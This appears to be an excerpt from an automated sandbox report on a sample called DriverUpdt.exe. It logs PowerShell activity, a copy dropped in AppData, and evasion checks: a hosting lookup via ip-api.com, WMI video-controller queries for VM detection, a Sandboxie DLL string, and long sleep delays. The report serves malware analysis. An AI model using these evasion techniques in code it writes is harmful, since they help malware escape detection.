                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Check if machine is in data center or colocation facility
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: DriverUpdt.exe, DriverUpdt.0.drBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\DriverUpdt.exeMemory allocated: 1350000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeMemory allocated: 1AFE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtMemory allocated: A10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtMemory allocated: 1A570000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtMemory allocated: 1090000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtMemory allocated: 1AB30000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DriverUpdt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWindow / User API: threadDelayed 9392Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWindow / User API: threadDelayed 448Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5557Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4271Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7311Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2296Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6006Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3616Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6616
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3117
                      Source: C:\Users\user\Desktop\DriverUpdt.exe TID: 7080Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1680Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep count: 6006 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep count: 3616 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1076Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228Thread sleep count: 6616 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968Thread sleep count: 3117 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt TID: 5948Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 1964Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt TID: 2576Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
